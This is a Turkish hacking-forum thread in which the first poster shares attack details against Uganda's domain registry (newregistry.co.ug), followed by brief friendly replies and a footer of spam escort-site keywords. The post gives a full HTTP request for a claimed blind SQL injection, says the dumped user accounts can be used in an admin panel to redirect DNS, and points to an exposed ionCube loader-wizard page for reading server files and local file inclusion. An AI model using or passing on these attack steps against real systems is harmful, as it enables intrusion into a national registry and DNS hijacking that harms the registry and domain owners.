nic uganda vulnerability

OxSiT

Spys-Z
Katılım
25 Eyl 2012
Mesajlar
278
Tepkime puanı
0
Puanları
0
merhaba arkadaşlar nic uganda ile ilgili gerekli açıkları vericeğim sizde çoğu kişiler gibi googleyi filan hackleyebilirsiniz :) sen neden yapmıyorsun diyenlere eskisi gibi sanal işler bize göre değil artık :)

newregistry.co.ug bling sql injection

POST /hsignup.php HTTP/1.1
Content-Length: 223
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: newregistry.co.ug
Cookie: PHPSESSID=120knlk8rc10mm4m07dj051421; uip=464a278ed0a3bf9edaa8e550068d801a; cartId=120knlk8rc10mm4m07dj051421
Host: newregistry.co.ug
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

bhsld=1&bhtld=1&hwplan=Starter&mhsld=1&mhtld=1&pt=&submit=Next&thsld=1&thtld=1&type=transfer


buradaki sqldan çekiceğiniz user accountları
https://new.registry.co.ug:8006/
bu adreste girerek istediğiniz dns yönlendirmelerini yaparsınız. Sql çekilmiyor demeyin kafanızı kırarım valla :D

gelelim aynı yerdeki diğer açık ise ioncube load wizards açığı bunun ne olduğunu uzun uzun anlatmak isterdim size ama ufak çapta google araştırması yaparak öğrenirsiniz :)

http://newregistry.co.ug/ioncube/loader-wizard.php?page=phpinfo

server dosyalarını okuyup lfi yedirebilirsiniz Hepinize kolay gelsin
 

Genest

Özel Üye
Katılım
12 Ara 2015
Mesajlar
1,008
Tepkime puanı
77
Puanları
0
Yaş
28
Eline sağlık volkan uzun aradan sonra seni görmek güzel :)
 

captainbrain

Prof Spys-z
Katılım
15 Ağu 2015
Mesajlar
1,006
Tepkime puanı
1
Puanları
0
Kral eve döndü :D
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012